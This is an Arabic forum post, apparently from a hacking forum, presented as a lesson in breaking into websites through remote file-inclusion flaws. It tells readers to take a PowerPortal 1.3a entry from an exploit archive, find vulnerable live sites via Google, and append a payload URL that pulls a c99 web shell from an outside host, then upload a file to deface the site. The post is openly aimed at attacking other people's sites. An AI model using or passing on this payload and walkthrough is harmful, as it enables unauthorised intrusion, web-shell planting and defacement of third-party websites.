درس إختراق المواقع عن طريق ثغرات الفايل انكلود

السلام عليكم ورحمه الله وبركاته ..

استمتع مع شرح الحشاش طيايووو
تفضلو الدرس

بسم الله الرحمن الرحيم
نبدأ الدرس

(درس إختراق المواقع عن طريق ثغرات الفايل انكلود)
اول شىء ندخل إلى موقع من مواقع الثغرات
www.milw0rm.com
تظهر لنا الصورة التالية :
ننزل إلى القسم المسمى
WEb apps

<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_1 width=500><tr><td class=td1 width=20></TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x742 والحجم 391 كيلوبايت .</TD></TR></TABLE>

و نختار اول ثغرة من الأعلى المسماة بإسم
PowerPortal 1.3a (index.php) Remote File Include Vulnerability
الان نقوم بشرح اسم الثغرة
اول جزء
PowerPortal 1.3a
هذا اسم الإسكربت المصاب بالثغرة

(index.php)
هذا اسم الملف المصاب
Remote File Include Vulnerability
هذا نوع الثغرة و واضح انها من نوع فايل انكلود و هذا اسهل نوع من انواع الثغرات تقريبا

تظهر لنا الثغرة بهذا الشكل و الشرح على الصورة

<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_2 width=500><tr><td class=td1 width=20></TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x768 والحجم 142 كيلوبايت .</TD></TR></TABLE>

الان فهمنا كل اجزاء الثغرة و طبعا هذا يرجع إلى قوتك فى اللغة الإنجليزية

الان ندخل إلى جوجل و نكتب الجزء الذى لونته فى الصورة السابقة لكى تظهر لنا المواقع المصابة

<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_3 width=500><tr><td class=td1 width=20></TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x742 والحجم 233 كيلوبايت .</TD></TR></TABLE>

سنقوم بإختيار موقع منهم و نتابع الصورة :

الان سنحذف كلمة
top.php
و نضغط الاتى

كود:
/index.php?file_name[]=http://www.soqor.net/tools/c99.txt?
بعد اسم الموقع
و نضغط
enter
لكى تظهر لنا الصفحة التالية

<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_4 width=500><tr><td class=td1 width=20></TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x742 والحجم 193 كيلوبايت .</TD></TR></TABLE>

الان ننزل إلى اسفل الصفحة إلى خانة
upload
و نضغط على زر
browse
لكى نحدد ملف لكى نرفعه لنعلن عن اختراقنا للموقع
و نضغط
upload

كما فى الصورة

<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_5 width=500><tr><td class=td1 width=20></TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x742 والحجم 148 كيلوبايت .</TD></TR></TABLE>

والنتيجه

<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_6 width=500><tr><td class=td1 width=20></TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x742 والحجم 73 كيلوبايت .</TD></TR></TABLE>

تم بحمد الله الدرس

طبعا مره حطيت الدرس هذا بالقراصنه

ضافني واحد يدعي انه نت فيرس

وسوووا قلق وحاله

الله يخلي البلوك

واذا في شيء مش واضح انا جاهز

درس إختراق المواقع عن طريق ثغرات الفايل انكلود User_offline

درس إختراق المواقع عن طريق ثغرات الفايل انكلود Reputation

vbrep_register("6403")

درس إختراق المواقع عن طريق ثغرات الفايل انكلود Report